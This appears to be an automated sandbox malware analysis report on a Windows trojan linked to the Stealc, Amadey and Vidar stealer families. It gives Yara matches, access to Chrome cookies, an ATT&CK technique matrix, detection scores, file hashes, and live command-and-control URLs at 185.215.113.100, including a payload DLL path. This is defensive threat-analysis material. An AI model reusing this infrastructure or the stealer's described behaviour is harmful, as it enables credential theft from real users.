              Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2800, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              2
              Process Injection
              1
              Masquerading
              1
              OS Credential Dumping
              641
              Security Software Discovery
              Remote Services1
              Data from Local System
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              24
              Virtualization/Sandbox Evasion
              LSASS Memory24
              Virtualization/Sandbox Evasion
              Remote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive112
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Process Injection
              NTDS222
              System Information Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Software Packing
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe37%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.100/e2b1563c6670f193.php100%URL Reputationmalware
              http://185.215.113.100/e2b1563c6670f193.php100%URL Reputationmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dll100%URL Reputationmalware
              http://185.215.113.100100%URL Reputationmalware
              http://upx.sf.net0%URL Reputationsafe
              http://185.215.113.100/100%URL Reputationmalware
              http://185.215.113.100/e2b1563c6670f193.phpi100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.100%Avira URL Cloudmalware
              http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG0%Avira URL Cloudsafe
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllK100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpo100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpo7%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpU100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpion:100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpi8%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpser100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ100%Avira URL Cloudmalware
              http://185.215.10%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.php9100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpinit.exe100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllK11%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpion:6%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpser18%VirustotalBrowse
              http://185.215.113.100Local0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.phpU11%VirustotalBrowse
              http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_100%Avira URL Cloudmalware
              http://185.215.10%VirustotalBrowse
              http://185.215.113.100s.exe0%Avira URL Cloudsafe
              http://185.215.113.100DBG0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.phpinit.exe18%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.php97%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.php&100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpf100%Avira URL Cloudmalware
              http://185.215.113.100Dm0%Avira URL Cloudsafe
              http://185.215.113.100/e2b1563c6670f193.php&8%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpf7%VirustotalBrowse
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ16%VirustotalBrowse
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.100/e2b1563c6670f193.phptrue
              • URL Reputation: malware
              • URL Reputation: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dlltrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/true
              • URL Reputation: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://185.215.113.100/e2b1563c6670f193.phpifile.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • 8%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGfile.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllk.file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpofile.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmptrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dllKfile.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmptrue
              • 11%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpion:file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmptrue
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmptrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpUfile.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • 11%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpserfile.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmptrue
              • 18%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZfile.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmptrue
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.1file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php9file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://upx.sf.netAmcache.hve.6.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpinit.exefile.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmptrue
              • 18%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100Localfile.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dll1563c6670f193.php1_file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100DBGfile.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100s.exefile.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php&file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmptrue
              • 8%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpffile.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmptrue
              • 7%, Virustotal, Browse
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100Dmfile.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.215.113.100
              unknownPortugal
              206894WHOLESALECONNECTIONSNLtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1502494
              Start date and time:2024-09-01 23:02:04 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 4m 13s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:8
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@2/6@0/1
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 52.168.117.173
              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target file.exe, PID 2800 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              17:03:21API Interceptor560961x Sleep call for process: file.exe modified
              17:04:22API Interceptor1x Sleep call for process: WerFault.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              185.215.113.100file.exeGet hashmaliciousStealcBrowse
              • 185.215.113.100/0d60be0de163924d/sqlite3.dll
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.100/e2b1563c6670f193.php
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
              • 185.215.113.100
              file.exeGet hashmaliciousAmadeyBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadeyBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, StealcBrowse
              • 185.215.113.16
              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
              • 185.215.113.16
              No context
              No context
              Process:C:\Users\user\Desktop\file.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
              Category:dropped
              Size (bytes):28672
              Entropy (8bit):2.5793180405395284
              Encrypted:false
              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
              MD5:41EA9A4112F057AE6BA17E2838AEAC26
              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
              Malicious:false
              Reputation:high, very likely benign file
              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.971582409668952
              Encrypted:false
              SSDEEP:192:QvdLK7UUv4Plh0BU/fI3juCZr+diWzuiFIZ24IO8TVB:KU4NiBU/YjW/zuiFIY4IO8X
              MD5:ED814D481BBEC172B5CF6CEB8F3D30FE
              SHA1:7896845691D3D216868F995BE837804B73D15434
              SHA-256:7A94D3E2ABF1A9ADEB683194E51CB27A86FC8FF60B29A533C97865123BB77155
              SHA-512:4E12B76F9DF87E9A631DEAA9648D0657389E9F0E75B624771E6F5EE64F9B584636BCA2AAEF5C43329716D7DA685B2E43F71221F12D779E9D36350E05111BC04D
              Malicious:true
              Reputation:low
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.6.9.8.2.4.2.5.5.3.3.9.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.6.9.8.2.4.3.8.3.4.6.4.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.0.d.6.0.9.0.-.e.e.7.1.-.4.0.7.c.-.9.7.1.3.-.1.c.b.a.7.9.7.c.a.3.9.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.a.a.6.d.7.5.-.f.f.3.6.-.4.a.f.7.-.b.4.b.4.-.a.5.5.2.b.7.5.5.f.5.b.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.f.0.-.0.0.0.1.-.0.0.1.4.-.4.0.6.f.-.7.7.4.e.b.2.f.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.1.6.d.b.1.1.8.1.e.c.4.d.5.4.a.1.f.e.2.a.e.d.1.f.2.5.a.0.b.d.4.7.d.5.3.c.e.e.7.2.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Sun Sep 1 21:04:02 2024, 0x1205a4 type
              Category:dropped
              Size (bytes):271522
              Entropy (8bit):1.4028254967951126
              Encrypted:false
              SSDEEP:384:2YIUI22eEveni+bQK8d3NnKxjwHgl69ZAyBdYG6l1iedu3l/cYM+YZZshgfN:sUIHeEyipK8ddUjwHgsTYFu1kae
              MD5:B6C01AFFD3B1CCE67E3BF08E634D49B0
              SHA1:069F4C508C9E0B83433374577434457824271DDE
              SHA-256:1063E1A938A37EC74B604788EA3FD0C0853D6E2C5414E509E0739961BC7EC00B
              SHA-512:BCC27A9EC1B0529B466D55B509FE120C11CBA7B105C87B8BD2DB500577A52A6A390CEEF4873BEF139B6035D999C75B6EB27D85C2F373A526EF5EE0686A0414AE
              Malicious:false
              Reputation:low
              Preview:MDMP..a..... ..........f............4...........`...<...........6...........T.......8...........T............<...............#...........%..............................................................................eJ...... &......GenuineIntel............T...........{..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8374
              Entropy (8bit):3.702450459318866
              Encrypted:false
              SSDEEP:192:R6l7wVeJGC66X6Y9aSU9q/gmfBHyprHq89by5sfc+Gm:R6lXJI6X6YgSU9ygmfBcySfcW
              MD5:1D800CC57CA32435AA221C15F057B1DB
              SHA1:1297A7FDD9525DC799A273EEF171450C5AFEC2FD
              SHA-256:04ED64E6197C3F578BB44292815B2A90E1B5E338809463BA4DBA65E5C7F18229
              SHA-512:922F4CF824A82E91F9B22489AD6C8C60B5543D72E72C71D56F530298EA8023B2FF3E6CEBF3ACD08CB972EA46D1491CE306F991F677CEB9A88997AE7FFE9FA7E0
              Malicious:false
              Reputation:low
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.8.0.0.<./.P.i.
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4594
              Entropy (8bit):4.474310381861214
              Encrypted:false
              SSDEEP:48:cvIwWl8zsXJg77aI9IrWpW8VYjYm8M4JIqFB6z+q8jfZUyO+7Fd:uIjf5I7aa7VDJzcsZU6Fd
              MD5:4BB151137508D9A0EC566D5FB5CC7AF5
              SHA1:1CDBC31780AFB99F732571D88704B4D6CDC24B89
              SHA-256:4518913557220CE3854768BFED458A7316D347AEA5093D84F6091957777C7B7D
              SHA-512:8C867D5D1BA8727F77CC14D116F220516393666DB4554E8D01C08C001575B443E6DA99AF10117A9C0D3F5006C05EE9575F6777B05896C975237BEB16B6D9B2CC
              Malicious:false
              Reputation:low
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="481686" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.465312369399602
              Encrypted:false
              SSDEEP:6144:EIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSb3T:5XD94+WlLZMM6YFH1+3T
              MD5:24078A75F78A4D897C5A52AB6FB4E89B
              SHA1:A7061EB5781197B4CF48B2034F0E1D65648B9E6A
              SHA-256:2A6EC806E5A1658208F3DD0763C68B40658CCC05006E5E3C1B9E561DCCD88000
              SHA-512:0BDFC366BAD6DE9ACEA4F2ECD1044B15FD24AE92773FB5BE59F76D1556C7041F3F9EF3EE4F2D8743DB638325F2F6532EAED2DDB949532A2831946F3D85D33166
              Malicious:false
              Reputation:low
              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...x...................................................................................................................................................................................................................................................................................................................................................L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.942546977390624
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:file.exe
              File size:1'830'912 bytes
              MD5:69a44afd5f25f695f1e1fe16abf56a39
              SHA1:16db1181ec4d54a1fe2aed1f25a0bd47d53cee72
              SHA256:7f7ab62446251c1fec500e70705d6840c982351dfd8303e0ca5ddf0e40c2f6fc
              SHA512:6424e236f9e1cbbe442c99b7350d5290b828f13dfd3e333b620c843bd39d86069962b3b960124b56861ab5d6b733df3160a521817b556eeb43b0f1903c83d007
              SSDEEP:49152:Gpm+X0eqLNiWI72xmsG/rNE5R+Y8agO2UmJj:Gw7N0yxmsGDNs+Y8K2H
              TLSH:7B8533733D629A3CD5DB0D7CCE464B5A3CAB2B16401BADADDB49005C5BA7113A73E22C
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f...........
              Icon Hash:90cececece8e8eb0
              Entrypoint:0xa98000
              Entrypoint Section:.taggant
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
              Time Stamp:0x66C88B4D [Fri Aug 23 13:14:53 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:2eabe9054cad5152567f0699947a2c5b
              Instruction
              jmp 00007F1F18B37BAAh
              bswap esi
              sbb eax, dword ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              jmp 00007F1F18B39BA5h
              add byte ptr [0000000Ah], al
              add byte ptr [eax], al
              add byte ptr [eax], dl
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [ebx], cl
              or al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [0B00000Ah], al
              or al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
